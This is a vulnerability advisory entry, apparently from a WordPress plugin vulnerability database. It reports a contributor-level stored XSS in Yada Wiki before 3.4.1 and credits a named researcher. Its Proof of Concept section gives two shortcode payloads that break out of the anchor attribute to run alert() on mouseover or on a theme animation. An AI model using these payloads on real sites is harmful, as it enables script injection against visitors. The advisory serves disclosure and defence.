WordPress Plugin Vulnerabilities
Yada Wiki < 3.4.1 - Contributor+ Stored XSS
Description
The plugin did not sanitise, validate or escape the anchor attribute of its shortcode, leading to a Stored Cross-Site Scripting issue
Proof of Concept
- Create a wiki page. If there is already a page, you can skip. The page can be a draft. - Add this shortcode to a post/page, view it and move the mouse over the 'XSS' link to trigger the XSS [yadawiki link="PAGE_NAME_HERE" anchor='" onmouseover="alert(/XSS/)' show="xss"] If the theme used is TwentyTwentyOne, the following payload can be used: [yadawiki link="PAGE_NAME_HERE" anchor='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)' show="xss"]
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)